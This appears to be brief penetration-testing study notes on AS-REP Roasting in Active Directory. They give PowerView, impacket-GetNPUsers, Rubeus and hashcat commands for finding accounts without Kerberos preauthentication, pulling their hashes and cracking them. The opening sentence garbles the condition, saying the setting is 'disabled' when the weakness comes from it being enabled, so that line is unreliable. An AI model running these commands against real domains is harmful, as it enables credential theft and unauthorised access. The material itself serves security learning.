AS-REP Roasting

AS-REP Roasting

It is vulnerable to the user whose Do not require Kerberos preauthentication is disabled . It will send AS-REQ and AS-REP we will receive the hash of that user

• Checking user

  • . .\Powerview.ps1

  • Get-DomainUser -PreauthNotRequired -Verbose

• Extracting hash

  • 1st method in linux

    • impacket-GetNPUsers -dc-ip <ip> -request -outputfile <file-to-store-hash> <domain>/<user>

    • impacket-GetNPUsers -dc-ip 192.168.50.70 -request -outputfile hashes.asreproast corp.com/pete

  • 2nd method in compromised window using Rubeus

    • Using Rubeus

      • .\Rubeus.exe asreproast /nowrap

  • hash cracking

    • sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force